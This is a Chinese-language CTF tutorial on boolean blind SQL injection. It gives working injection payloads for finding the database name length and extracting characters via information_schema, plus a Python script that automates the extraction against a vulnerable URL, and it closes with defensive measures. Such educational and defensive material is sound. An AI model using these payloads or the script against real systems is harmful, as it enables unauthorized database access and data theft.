CTF—SQL注入（get）

### CTF SQL 布尔盲注 攻防技巧 漏洞利用 示例教程 #### 什么是SQL布尔盲注？ SQL布尔盲注是一种通过观察页面返回的不同状态来判断注入条件是否成立的技术。它不依赖于错误消息或时间延迟，而是依据页面逻辑的变化来进行推断。通常情况下，攻击者会向目标应用发送一系列带有不同参数的请求，并根据响应的内容差异逐步还原数据库中的敏感信息。 布尔盲注的核心在于构造能够触发真假分支的查询语句[^2]。例如，在某些场景下，如果注入点允许执行如下形式的SQL片段： ```sql AND (SELECT ASCII(SUBSTRING((SELECT database()),1,1))=X) ``` 那么可以通过调整`X`的值逐一测试字符编码，直到找到使整个表达式为真的情况为止。 #### 如何实现SQL布尔盲注？ 以下是几个常见的技术要点以及其实现方法： ##### 1. 判断长度 为了获取字段的具体内容，首先需要知道其总长度。这一步骤可通过不断增大比较数值完成： ```sql ' AND LENGTH(database())>N--+ ``` 其中 `N` 是从零开始递增的一个整数变量。一旦发现某个临界点使得前后端交互行为发生变化，则说明当前尝试接近实际大小[^3]。 ##### 2. 提取单个字节 明确了字符串的整体规模之后，就可以逐位提取组成它的各个组成部分了。下面给出了一种标准模式用于检索指定位置上的ASCII码值： ```sql ' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='yourdb'),M,N))<Z --+ ``` 这里分别代表起始偏移量(`M`)、截取宽度(`N`)还有上限阈值(`Z`)三个重要参数设置选项。通过对这些属性灵活组合运用即可达成最终目的——即重建完整的原始记录条目列表[^4]。 ##### 3. 自动化脚本编写 手动操作效率低下而且容易出错，因此建议开发专用工具辅助分析过程。Python语言因其简洁易懂而成为首选方案之一。以下展示了一个简单的框架结构供参考： ```python import requests url = 'http://example.com/vuln.php?id=' true_str = '<h1>Welcome</h1>' false_str = '' def check(payload): r = requests.get(url + payload) return true_str in r.text and false_str not in r.text length = 0 while True: length += 1 if not check(f"' AND LENGTH(database())={length}--+"): break print(f'Database name has {length-1} characters.') result = '' for i in range(1, length): low, high = 0, 128 while low < high: mid = (low + high) >> 1 if check(f"' AND ASCII(SUBSTR(database(),{i},1))>{mid}--+"): low = mid + 1 else: high = mid result += chr(low) print('Database:', result) ``` 此代码片段展示了如何自动化探测MySQL数据库名称的过程。注意替换相应的URL地址和标志串以适应具体环境需求[^1]。 #### 防御措施 针对上述提到的各种潜在威胁，可以从以下几个方面加强防护力度： - **输入验证**: 对所有外部提交的数据进行全面校验，拒绝不符合预期格式的内容进入后续处理流程。 - **最小权限原则**: 确保应用程序运行账户仅具备必要的访问权利，从而减少可能造成的损害范围。 - **预编译语句**: 使用ORM或者PreparedStatement等方式构建SQL指令，有效规避动态拼接带来的风险隐患。 - **日志审计**: 定期审查服务器活动历史记录，及时察觉异常状况并采取相应补救行动。 ---